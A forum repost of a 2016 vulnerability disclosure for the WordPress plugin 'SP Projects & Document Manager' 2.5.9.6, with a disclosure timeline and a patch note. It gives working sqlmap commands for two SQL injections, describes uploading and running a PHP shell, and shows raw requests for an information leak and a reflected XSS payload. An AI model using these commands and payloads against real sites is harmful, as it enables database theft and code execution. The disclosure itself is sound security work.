|
|
本帖最后由 人=族 于 2016-3-10 10:26 编辑
* Exploit Title: Multiple Vulnerabilities in SP Projects & Document Manager
* Discovery Date: 2016/01/13
* Public Disclosure Date: 2016/03/06
* Exploit Author: Michael Helwig
* Contact: https://twitter.com/c0dmtr1x
* Vendor Homepage: http://smartypantsplugins.com/
* Software Link: https://de.wordpress.org/plugins/sp-client-document-manager/
* Version: 2.5.9.6
* Tested on: WordPress 4.4.1
* Category: webapps
Description
===============================================================================
The Wordpress plugin "SP Projects & Document Manager" contains several
vulnerabilities: arbitrary file upload and code execution by registered users,
sql injections, information leakage and xss by unregistered users.
PoC
===============================================================================
1. SQL-Injections
~~~~~~~~~~~~~~~~~~~
Several SQL injections have been known in version 2.4.1 but have been fixed in between.
At least two of them reappeared in version 2.5.9.6:
- The injections in the "id"-parameter on
http://wordpress.local.de/wp-con ... ment-manager/admin/
ajax.php?function=download-project&id=1
- and the POST-Parameter vendor_email on
http://wordpress.local.de/wp-con ... ment-manager/admin/
ajax.php?function=email-vendor
See https://packetstormsecurity.com/files/129212/\
WordPress-SP-Client-Document-Manager-2.4.1-SQL-Injection.html
for the original information on this.
Both injections can be exploited by sqlmap:
[1] sqlmap -u "http://wordpress.local.de/wp-content/plugins/sp-client-document\
-manager/admin/ajax.php?function=download-project&id=1*" -p id --dbms mysql
[2] sqlmap -u "http://wordpress.local.de/wp-content/plugins/sp-client-document\
-manager/admin/ajax.php?function=email-vendor" --data="vendor_email[]=0) \
OR (1=1 *" --dbms mysql
2. Arbitrary code executions
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Clients can upload PHP files (*.php, *.php5 etc.) and execute them via a GET
request to their specific location in the default upload path (which can vary
depending on the configuration of the plugin). The URL to uploaded files typically
looks like
/wp-content/uploads/sp-client-document-manager/[UPLOADER-ID]/[FILE]
eg
http://wordpress.local.de/wp-con ... nt-document-manager\
/1/shell.php
Files can even be accessed directly if the option "Require Login to Download"
is checked in the plugin configuration.
3. Information leakage
~~~~~~~~~~~~~~~~~~~~~~~
Information about uploaded files can be retrieved by non-logged in users via a
call to admin/ajax.php:
-----------------------
GET http://wordpress.local.de/wp-con ... nt-document-manager\
/admin/ajax.php?function=get-file-info&id=1
-- response --
200 OK
Date: Wed, 13 Jan 2016 22:17:46 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.14
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 211
Connection: close
Content-Type: application/json
{"id":"1","name":"in.php","file":"index.php","notes":"","tags":"","uid":"1",\
"cid":"0","pid":"0","parent":"0","date":"2016-01-13 15:18:27","status":"0",\
"form_id":"0","entry_id":"0","group_id":"0","client_id":"0"}
---------------
Specifically you can retrieve info about the upload user id and filename
to determine the URL for direct access to the file (see 3).
4. XSS Vulnerability
~~~~~~~~~~~~~~~~~~~~~~~
There is a (non-persistent) XSS vulnerability in the admin/ajax.php file
for function=email-vendor:
---------------
POST http://wordpress.local.de/wp-con ... nt-document-manager\
/admin/ajax.php?function=email-vendor
Content-Type: application/x-www-form-urlencoded
vendor_email[]=1&vendor=<script>alert(1);</script>
-- response --
200 OK
Date: Sun, 06 Mar 2016 10:00:30 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 101
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
<p style="color:green;font-weight:bold">Dateien gesendet an <script>alert(1);\
</script></p>
---------------
Timeline
===============================================================================
2016/01/13 - Issues discovered
2016/01/14 - Issues reported to vendor via contact form on his website
2016/01/27 - No response from vendor; WordPress security team notified
2016/01/29 - Reply from Wordpress security team
2016/03/02 - Vendor released security update 2.6.0.0 - issues fixed
Solution
===============================================================================
Update to latest version |
|
发表于 2016-3-9 10:43:01
发表于 2016-3-9 14:11:48
